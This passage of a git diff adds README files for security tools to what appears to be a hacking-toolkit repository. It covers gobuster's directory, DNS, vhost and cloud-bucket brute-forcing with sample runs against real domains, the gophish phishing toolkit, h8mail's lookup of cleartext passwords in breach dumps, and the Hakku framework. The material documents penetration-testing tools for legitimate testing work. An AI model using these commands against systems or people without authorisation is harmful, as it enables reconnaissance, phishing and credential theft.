Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : google.com +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 11:54:54 Starting gobuster +=============================================================== +Found: www.google.com [172.217.25.36, 2404:6800:4006:802::2004] +Found: admin.google.com [172.217.25.46, 2404:6800:4006:806::200e] +Found: store.google.com [172.217.167.78, 2404:6800:4006:802::200e] +Found: mobile.google.com [172.217.25.43, 2404:6800:4006:802::200b] +Found: ns1.google.com [216.239.32.10, 2001:4860:4802:32::a] +Found: m.google.com [172.217.25.43, 2404:6800:4006:802::200b] +Found: cse.google.com [172.217.25.46, 2404:6800:4006:80a::200e] +Found: chrome.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: search.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: local.google.com [172.217.25.46, 2404:6800:4006:80a::200e] +Found: news.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: blog.google.com [216.58.199.73, 2404:6800:4006:806::2009] +Found: support.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: wap.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: directory.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: translate.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: music.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: mail.google.com [172.217.25.37, 2404:6800:4006:802::2005] +=============================================================== +2019/06/21 11:54:55 Finished +=============================================================== +``` + +Base domain validation warning when the base domain fails to resolve. This is a warning rather than a failure in case the user fat-fingers while typing the domain. 
+ +```text +gobuster dns -d yp.to -w ~/wordlists/subdomains.txt -i + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : yp.to +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 11:56:43 Starting gobuster +=============================================================== +2019/06/21 11:56:53 [-] Unable to validate base domain: yp.to +Found: cr.yp.to [131.193.32.108, 131.193.32.109] +=============================================================== +2019/06/21 11:56:53 Finished +=============================================================== +``` + +Wildcard DNS is also detected properly: + +```text +gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : 0.0.1.xip.io +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 12:13:48 Starting gobuster +=============================================================== +2019/06/21 12:13:48 [-] Wildcard DNS found. IP address(es): 1.0.0.0 +2019/06/21 12:13:48 [!] To force processing of Wildcard DNS, specify the '--wildcard' switch. 
+=============================================================== +2019/06/21 12:13:48 Finished +=============================================================== +``` + +If the user wants to force processing of a domain that has wildcard entries, use `--wildcard`: + +```text +gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt --wildcard + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : 0.0.1.xip.io +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 12:13:51 Starting gobuster +=============================================================== +2019/06/21 12:13:51 [-] Wildcard DNS found. IP address(es): 1.0.0.0 +Found: 127.0.0.1.xip.io +Found: test.127.0.0.1.xip.io +=============================================================== +2019/06/21 12:13:53 Finished +=============================================================== +``` + +## `dir` Mode + +### Options + +```text +Uses directory/file enumeration mode + +Usage: + gobuster dir [flags] + +Flags: + -f, --add-slash Append / to each request + -c, --cookies string Cookies to use for the requests + -d, --discover-backup Also search for backup files by appending multiple backup extensions + --exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes. 
+ -e, --expanded Expanded mode, print full URLs + -x, --extensions string File extension(s) to search for + -r, --follow-redirect Follow redirects + -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' + -h, --help help for dir + --hide-length Hide the length of the body in the output + -m, --method string Use the following HTTP method (default "GET") + -n, --no-status Don't print status codes + -k, --no-tls-validation Skip TLS certificate verification + -P, --password string Password for Basic Auth + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + -s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set) + -b, --status-codes-blacklist string Negative status codes (will override status-codes if set) (default "404") + --timeout duration HTTP Timeout (default 10s) + -u, --url string The target URL + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + -U, --username string Username for Basic Auth + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 
1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + +```text +gobuster dir -u https://mysite.com/path/to/folder -c 'session=123456' -t 50 -w common-files.txt -x .php,.html +``` + +Default options looks like this: + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dir +[+] Url/Domain : https://buffered.io/ +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/shortlist.txt +[+] Status codes : 200,204,301,302,307,401,403 +[+] User Agent : gobuster/3.2.0 +[+] Timeout : 10s +=============================================================== +2019/06/21 11:49:43 Starting gobuster +=============================================================== +/categories (Status: 301) +/contact (Status: 301) +/posts (Status: 301) +/index (Status: 200) +=============================================================== +2019/06/21 11:49:44 Finished +=============================================================== +``` + +Default options with status codes disabled looks like this: + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -n + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dir +[+] Url/Domain : https://buffered.io/ +[+] 
Threads : 10 +[+] Wordlist : /home/oj/wordlists/shortlist.txt +[+] Status codes : 200,204,301,302,307,401,403 +[+] User Agent : gobuster/3.2.0 +[+] No status : true +[+] Timeout : 10s +=============================================================== +2019/06/21 11:50:18 Starting gobuster +=============================================================== +/categories +/contact +/index +/posts +=============================================================== +2019/06/21 11:50:18 Finished +=============================================================== +``` + +Verbose output looks like this: + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -v + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dir +[+] Url/Domain : https://buffered.io/ +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/shortlist.txt +[+] Status codes : 200,204,301,302,307,401,403 +[+] User Agent : gobuster/3.2.0 +[+] Verbose : true +[+] Timeout : 10s +=============================================================== +2019/06/21 11:50:51 Starting gobuster +=============================================================== +Missed: /alsodoesnotexist (Status: 404) +Found: /index (Status: 200) +Missed: /doesnotexist (Status: 404) +Found: /categories (Status: 301) +Found: /posts (Status: 301) +Found: /contact (Status: 301) +=============================================================== +2019/06/21 11:50:51 Finished +=============================================================== +``` + +Example showing content length: + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -l + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : 
dir +[+] Url/Domain : https://buffered.io/ +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/shortlist.txt +[+] Status codes : 200,204,301,302,307,401,403 +[+] User Agent : gobuster/3.2.0 +[+] Show length : true +[+] Timeout : 10s +=============================================================== +2019/06/21 11:51:16 Starting gobuster +=============================================================== +/categories (Status: 301) [Size: 178] +/posts (Status: 301) [Size: 178] +/contact (Status: 301) [Size: 178] +/index (Status: 200) [Size: 51759] +=============================================================== +2019/06/21 11:51:17 Finished +=============================================================== +``` + +Quiet output, with status disabled and expanded mode looks like this ("grep mode"): + +```text +gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -q -n -e +https://buffered.io/index +https://buffered.io/contact +https://buffered.io/posts +https://buffered.io/categories +``` + +## `vhost` Mode + +### Options + +```text +Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter) + +Usage: + gobuster vhost [flags] + +Flags: + --append-domain Append main domain from URL to words from wordlist. Otherwise the fully qualified domains need to be specified in the wordlist. + -c, --cookies string Cookies to use for the requests + --domain string the domain to append when using an IP address as URL. If left empty and you specify a domain based URL the hostname from the URL is extracted + --exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes. 
+ -r, --follow-redirect Follow redirects + -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' + -h, --help help for vhost + -m, --method string Use the following HTTP method (default "GET") + -k, --no-tls-validation Skip TLS certificate verification + -P, --password string Password for Basic Auth + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + --timeout duration HTTP Timeout (default 10s) + -u, --url string The target URL + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + -U, --username string Username for Basic Auth + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + + +```text +gobuster vhost -u https://mysite.com -w common-vhosts.txt +``` + +Normal sample run goes like this: + +```text +gobuster vhost -u https://mysite.com -w common-vhosts.txt + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Url: https://mysite.com +[+] Threads: 10 +[+] Wordlist: common-vhosts.txt +[+] User Agent: gobuster/3.2.0 +[+] Timeout: 10s +=============================================================== +2019/06/21 08:36:00 Starting gobuster 
+=============================================================== +Found: www.mysite.com +Found: piwik.mysite.com +Found: mail.mysite.com +=============================================================== +2019/06/21 08:36:05 Finished +=============================================================== +``` + +## `fuzz` Mode + +### Options + +```text +Uses fuzzing mode + +Usage: + gobuster fuzz [flags] + +Flags: + -c, --cookies string Cookies to use for the requests + --exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes. + -b, --excludestatuscodes string Negative status codes (will override statuscodes if set) + -r, --follow-redirect Follow redirects + -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' + -h, --help help for fuzz + -m, --method string Use the following HTTP method (default "GET") + -k, --no-tls-validation Skip TLS certificate verification + -P, --password string Password for Basic Auth + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + --timeout duration HTTP Timeout (default 10s) + -u, --url string The target URL + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + -U, --username string Username for Basic Auth + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 
1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + +```text +gobuster fuzz -u https://example.com?FUZZ=test -w parameter-names.txt +``` + +## `s3` Mode + +### Options + +```text +Uses aws bucket enumeration mode + +Usage: + gobuster s3 [flags] + +Flags: + -h, --help help for s3 + -m, --maxfiles int max files to list when listing buckets (only shown in verbose mode) (default 5) + -k, --no-tls-validation Skip TLS certificate verification + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + --timeout duration HTTP Timeout (default 10s) + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 
1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + +```text +gobuster s3 -w bucket-names.txt +``` + +## `gcs` Mode + +### Options + +```text +Uses gcs bucket enumeration mode + +Usage: + gobuster gcs [flags] + +Flags: + -h, --help help for gcs + -m, --maxfiles int max files to list when listing buckets (only shown in verbose mode) (default 5) + -k, --no-tls-validation Skip TLS certificate verification + --proxy string Proxy to use for requests [http(s)://host:port] + --random-agent Use a random User-Agent string + --retry Should retry on request timeout + --retry-attempts int Times to retry on request timeout (default 3) + --timeout duration HTTP Timeout (default 10s) + -a, --useragent string Set the User-Agent string (default "gobuster/3.2.0") + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 
1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + +```text +gobuster gcs -w bucket-names.txt +``` + +## Wordlists via STDIN + +Wordlists can be piped into `gobuster` via stdin by providing a `-` to the `-w` option: + +```bash +hashcat -a 3 --stdout ?l | gobuster dir -u https://mysite.com -w - +``` + +Note: If the `-w` option is specified at the same time as piping from STDIN, an error will be shown and the program will terminate. + +## Patterns + +You can supply pattern files that will be applied to every word from the wordlist. +Just place the string `{GOBUSTER}` in it and this will be replaced with the word. +This feature is also handy in s3 mode to pre- or postfix certain patterns. + +**Caution:** Using a big pattern file can cause a lot of request as every pattern is applied to every word in the wordlist. + +### Example file + +```text +{GOBUSTER}Partial +{GOBUSTER}Service +PRE{GOBUSTER}POST +{GOBUSTER}-prod +{GOBUSTER}-dev +``` + +#### Use case in combination with patterns + +- Create a custom wordlist for the target containing company names and so on +- Create a pattern file to use for common bucket names. + +```bash +curl -s --output - https://raw.githubusercontent.com/eth0izzle/bucket-stream/master/permutations/extended.txt | sed -s 's/%s/{GOBUSTER}/' > patterns.txt +``` + +- Run gobuster with the custom input. 
Be sure to turn verbose mode on to see the bucket details + +```text +gobuster s3 --wordlist my.custom.wordlist -p patterns.txt -v +``` + +Normal sample run goes like this: + +```text +PS C:\Users\firefart\Documents\code\gobuster> .\gobuster.exe s3 --wordlist .\wordlist.txt +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Threads: 10 +[+] Wordlist: .\wordlist.txt +[+] User Agent: gobuster/3.2.0 +[+] Timeout: 10s +[+] Maximum files to list: 5 +=============================================================== +2019/08/12 21:48:16 Starting gobuster in S3 bucket enumeration mode +=============================================================== +webmail +hacking +css +img +www +dav +web +localhost +=============================================================== +2019/08/12 21:48:17 Finished +=============================================================== +``` + +Verbose and sample run + +```text +PS C:\Users\firefart\Documents\code\gobuster> .\gobuster.exe s3 --wordlist .\wordlist.txt -v +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Threads: 10 +[+] Wordlist: .\wordlist.txt +[+] User Agent: gobuster/3.2.0 +[+] Verbose: true +[+] Timeout: 10s +[+] Maximum files to list: 5 +=============================================================== +2019/08/12 21:49:00 Starting gobuster in S3 bucket enumeration mode +=============================================================== +www [Error: All access to this object has been disabled (AllAccessDisabled)] +hacking [Error: Access Denied (AccessDenied)] +css [Error: All access to this object has been disabled (AllAccessDisabled)] +webmail [Error: All access to this object has been disabled 
(AllAccessDisabled)] +img [Bucket Listing enabled: GodBlessPotomac1.jpg (1236807b), HOMEWORKOUTAUDIO.zip (203908818b), ProductionInfo.xml (11946b), Start of Perpetual Motion Logo-1.mp3 (621821b), addressbook.gif (3115b)] +web [Error: Access Denied (AccessDenied)] +dav [Error: All access to this object has been disabled (AllAccessDisabled)] +localhost [Error: Access Denied (AccessDenied)] +=============================================================== +2019/08/12 21:49:01 Finished +=============================================================== +``` + +Extended sample run + +```text +PS C:\Users\firefart\Documents\code\gobuster> .\gobuster.exe s3 --wordlist .\wordlist.txt -e +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Threads: 10 +[+] Wordlist: .\wordlist.txt +[+] User Agent: gobuster/3.2.0 +[+] Timeout: 10s +[+] Expanded: true +[+] Maximum files to list: 5 +=============================================================== +2019/08/12 21:48:38 Starting gobuster in S3 bucket enumeration mode +=============================================================== +http://css.s3.amazonaws.com/ +http://www.s3.amazonaws.com/ +http://webmail.s3.amazonaws.com/ +http://hacking.s3.amazonaws.com/ +http://img.s3.amazonaws.com/ +http://web.s3.amazonaws.com/ +http://dav.s3.amazonaws.com/ +http://localhost.s3.amazonaws.com/ +=============================================================== +2019/08/12 21:48:38 Finished +=============================================================== +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gophish.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gophish.md new file mode 100755 index 00000000..9cb37563 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gophish.md @@ -0,0 +1,60 @@ +![gophish 
logo](https://raw.github.com/gophish/gophish/master/static/images/gophish_purple.png) + +Gophish +======= + +![Build Status](https://github.com/gophish/gophish/workflows/CI/badge.svg) [![GoDoc](https://godoc.org/github.com/gophish/gophish?status.svg)](https://godoc.org/github.com/gophish/gophish) + +Gophish: Open-Source Phishing Toolkit + +[Gophish](https://getgophish.com) is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training. + +### Install + +Installation of Gophish is dead-simple - just download and extract the zip containing the [release for your system](https://github.com/gophish/gophish/releases/), and run the binary. Gophish has binary releases for Windows, Mac, and Linux platforms. + +### Building From Source +**If you are building from source, please note that Gophish requires Go v1.10 or above!** + +To build Gophish from source, simply run ```go get github.com/gophish/gophish``` and ```cd``` into the project source directory. Then, run ```go build```. After this, you should have a binary called ```gophish``` in the current directory. + +### Docker +You can also use Gophish via the official Docker container [here](https://hub.docker.com/r/gophish/gophish/). + +### Setup +After running the Gophish binary, open an Internet browser to https://localhost:3333 and login with the default username (admin) and password (gophish). + +### Documentation + +Documentation can be found on our [site](http://getgophish.com/documentation). Find something missing? Let us know by filing an issue! + +### Issues + +Find a bug? Want more features? Find something missing in the documentation? Let us know! Please don't hesitate to [file an issue](https://github.com/gophish/gophish/issues/new) and we'll get right on it. 
+ +### License +``` +Gophish - Open-Source Phishing Framework + +The MIT License (MIT) + +Copyright (c) 2013 - 2020 Jordan Wright + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software ("Gophish Community Edition") and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/h8mail.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/h8mail.md new file mode 100755 index 00000000..91a19cce --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/h8mail.md @@ -0,0 +1,193 @@ +H8Mail: OSINT para Encontrar Direcciones Email Hackeadas + +H8Mail es una herramienta de OSINT y buscador de contraseñas potente y fácil de usar. Puedes usarlo para encontrar contraseñas a través de diferentes servicios de violación y reconocimiento. 
+ +#Características de H8Mail + +Coincidencia de patrones de correo electrónico (reg exp), útil para la lectura de las salidas de otras herramientas +Pasar URLs para encontrar y apuntar directamente a los correos electrónicos en las páginas +Patrones sueltos para búsquedas locales (“john.smith”, “evilcorp”) +Instalación sin complicaciones. Disponible a través de pip, sólo requiere solicitudes +Lectura masiva de archivos para la fijación de objetivos +Salida a archivo CSV o JSON +Compatible con los scripts torrent de “Breach Compilation”. +Búsqueda de archivos de texto claro y comprimidos .gz localmente usando multiprocesamiento +Obtener correos electrónicos relacionados +Persigue correos electrónicos relacionados añadiéndolos a la búsqueda en curso +Admite servicios de búsqueda premium para usuarios avanzados +Consulta personalizada de las APIs premium. Soporta nombre de usuario, hash, ip, dominio y contraseña y más +Reagrupa los resultados de las infracciones para todos los objetivos y métodos +Incluye la opción de ocultar las contraseñas para las demostraciones + +#APIs + +Servicio Funciones Estado +HaveIBeenPwned(v3) - Número de filtraciones de correo electrónico +HaveIBeenPwned Pastes(v3) - URL de los archivos de texto que mencionan los objetivos +Hunter.io – Público Número de correos electrónicos relacionados +Hunter.io – Servicio(nivel gratuito) Correos electrónicos relacionados con texto claro +Snusbase – Servicio Contraseñas en texto claro, hashs y sales, nombres de usuario, IPs – Rápido +Leak-Lookup – Público Número de resultados de filtraciones que se pueden buscar +Leak-Lookup – Servicio Contraseñas en texto claro, hashs y sales, nombres de usuario, IPs, dominio +Emailrep.io – Servicio(gratis) Lo último que se ha visto en las filtraciones, los perfiles de las redes sociales +scylla.so – Servicio (gratis) Contraseñas en texto claro, hashs y sales, nombres de usuario, IPs, dominios +Dehashed.com – Servicio Contraseñas en texto claro, hashs y sales, nombres 
de usuario, IPs, dominios +IntelX.io – Servicio (prueba gratuita) Contraseñas en texto claro, hashs y sales, nombres de usuario, IPs, dominio, billeteras Bitcoin, IBAN +Breachdirectory.tk – Servicio (gratis) Contraseñas en texto claro, hashs y sales, nombres de usuario, dominio + +Consulta para un único objetivo +h8mail -t objetivo@dominio.com + + +Buscar email hackeado +Ver cuentas y contraseñas hackeadas con H8Mail + +Consulta de la lista de objetivos, indicando el archivo de configuración para las claves de la API, salida a pwned_targets.csv +h8mail -t targets.txt -c config.ini -o pwned_targets.csv + +Consulta sin realizar llamadas a la API mediante una copia local de Breach Compilation +h8mail -t targets.txt -bc ../Downloads/BreachCompilation/ -sk + +Buscar en todos los archivos .gz los objetivos encontrados en targets.txt localmente +h8mail -t targets.txt -gz /tmp/Collection1/ -sk + +Comprobar un volcado de texto claro para el objetivo. Agregar los siguientes 10 correos electrónicos relacionados a los objetivos que deseas comprobar. Lectura de claves desde la CLI. +h8mail -t admin@evilcorp.com -lb /tmp/4k_Combo.txt -ch 10 -k "hunterio=ABCDE123" + +Para más detalles de su uso, puedes visitar el repositorio en GitHub o escribir el siguiente comando: +h8mail -h + + + +----- + +## :tangerine: Usage + +```bash +usage: h8mail [-h] [-t USER_TARGETS [USER_TARGETS ...]] + [-u USER_URLS [USER_URLS ...]] [-q USER_QUERY] [--loose] + [-c CONFIG_FILE [CONFIG_FILE ...]] [-o OUTPUT_FILE] + [-bc BC_PATH] [-sk] [-k CLI_APIKEYS [CLI_APIKEYS ...]] + [-lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...]] + [-gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...]] [-sf] + [-ch [CHASE_LIMIT]] [--power-chase] [--hide] [--debug] + [--gen-config] + +Email information and password lookup tool + +optional arguments: + -h, --help show this help message and exit + -t USER_TARGETS [USER_TARGETS ...], --targets USER_TARGETS [USER_TARGETS ...] + Either string inputs or files. 
Supports email pattern + matching from input or file, filepath globing and + multiple arguments + -u USER_URLS [USER_URLS ...], --url USER_URLS [USER_URLS ...] + Either string inputs or files. Supports URL pattern + matching from input or file, filepath globing and + multiple arguments. Parse URLs page for emails. + Requires http:// or https:// in URL. + -q USER_QUERY, --custom-query USER_QUERY + Perform a custom query. Supports username, password, + ip, hash, domain. Performs an implicit "loose" search + when searching locally + --loose Allow loose search by disabling email pattern + recognition. Use spaces as pattern seperators + -c CONFIG_FILE [CONFIG_FILE ...], --config CONFIG_FILE [CONFIG_FILE ...] + Configuration file for API keys. Accepts keys from + Snusbase, WeLeakInfo, Leak-Lookup, HaveIBeenPwned, + Emailrep, Dehashed and hunterio + -o OUTPUT_FILE, --output OUTPUT_FILE + File to write CSV output + -bc BC_PATH, --breachcomp BC_PATH + Path to the breachcompilation torrent folder. Uses the + query.sh script included in the torrent + -sk, --skip-defaults Skips HaveIBeenPwned and HunterIO check. Ideal for + local scans + -k CLI_APIKEYS [CLI_APIKEYS ...], --apikey CLI_APIKEYS [CLI_APIKEYS ...] + Pass config options. Supported format: "K=V,K=V" + -lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...], --local-breach LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...] + Local cleartext breaches to scan for targets. Uses + multiprocesses, one separate process per file, on + separate worker pool by arguments. Supports file or + folder as input, and filepath globing + -gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...], --gzip LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...] + Local tar.gz (gzip) compressed breaches to scans for + targets. Uses multiprocesses, one separate process per + file. Supports file or folder as input, and filepath + globing. Looks for 'gz' in filename + -sf, --single-file If breach contains big cleartext or tar.gz files, set + this flag to view the progress bar. 
Disables + concurrent file searching for stability + -ch [CHASE_LIMIT], --chase [CHASE_LIMIT] + Add related emails from hunter.io to ongoing target + list. Define number of emails per target to chase. + Requires hunter.io private API key if used without + power-chase + --power-chase Add related emails from ALL API services to ongoing + target list. Use with --chase + --hide Only shows the first 4 characters of found passwords + to output. Ideal for demonstrations + --debug Print request debug information + --gen-config, -g Generates a configuration file template in the current + working directory & exits. Will overwrite existing + h8mail_config.ini file +``` + +----- + +## :tangerine: Usage examples + +###### Query for a single target + +```bash +$ h8mail -t target@example.com +``` + +###### Query for list of targets, indicate config file for API keys, output to `pwned_targets.csv` +```bash +$ h8mail -t targets.txt -c config.ini -o pwned_targets.csv +``` + +###### Query a list of targets against local copy of the Breach Compilation, pass API key for [Snusbase](https://snusbase.com/) from the command line +```bash +$ h8mail -t targets.txt -bc ../Downloads/BreachCompilation/ -k "snusbase_token=$snusbase_token" +``` + +###### Query without making API calls against local copy of the Breach Compilation +```bash +$ h8mail -t targets.txt -bc ../Downloads/BreachCompilation/ -sk +``` + +###### Search every .gz file for targets found in targets.txt locally, skip default checks + +```bash +$ h8mail -t targets.txt -gz /tmp/Collection1/ -sk +``` + +###### Check a cleartext dump for target. Add the next 10 related emails to targets to check. Read keys from CLI + +```bash +$ h8mail -t admin@evilcorp.com -lb /tmp/4k_Combo.txt -ch 10 -k "hunterio=ABCDE123" +``` +###### Query username. Read keys from CLI + +```bash +$ h8mail -t JSmith89 -q username -k "dehashed_email=user@email.com" "dehashed_key=ABCDE123" +``` + +###### Query IP. Chase all related targets. 
Read keys from CLI + + +```bash +$ h8mail -t 42.202.0.42 -q ip -c h8mail_config_priv.ini -ch 2 --power-chase +``` + +###### Fetch URL content (CLI + file). Target all found emails + + +```bash +$ h8mail -u "https://pastebin.com/raw/kQ6WNKqY" "list_of_urls.txt" +``` + + +----- diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hakku.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hakku.md new file mode 100755 index 00000000..45ba3dd8 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/H/hakku.md @@ -0,0 +1,83 @@ +# Hakku Framework [![Build Status][build]][build link] ![License][license] ![Python][python] + + +#### What is Hakku Framework? + +Hakku is simple framework that has been made for penetration testing tools. +Hakku framework offers simple structure, basic CLI, and useful features for penetration testing tools developing. +Hakku is on early stages and may be unstable, so please download the released versions from github or sourceforge, +don't just clone github repository except you don't want stability, you want to try out latest features, or you just want to develop Hakku. +Hakku is under MIT license, in other words you can do what you ever want with the source code. + +#### What will i need to run Hakku framework? + +Hakku framework is written in python 3, and developed mainly on Arch Linux. +So you should get Hakku framework running with Linux based operating system, python 3.5, and the dependencies. + +#### How i can get started? + +If you are new to Hakku framework you should look at the official wiki. + +#### OS support + +* Linux supported, and developed on/for linux +* OS X support not planned +* Windows support not planned + +#### Basic features + +Hakku framework features basic CLI to load up and run penetration testing tools, simple scripting interface, and python api. 
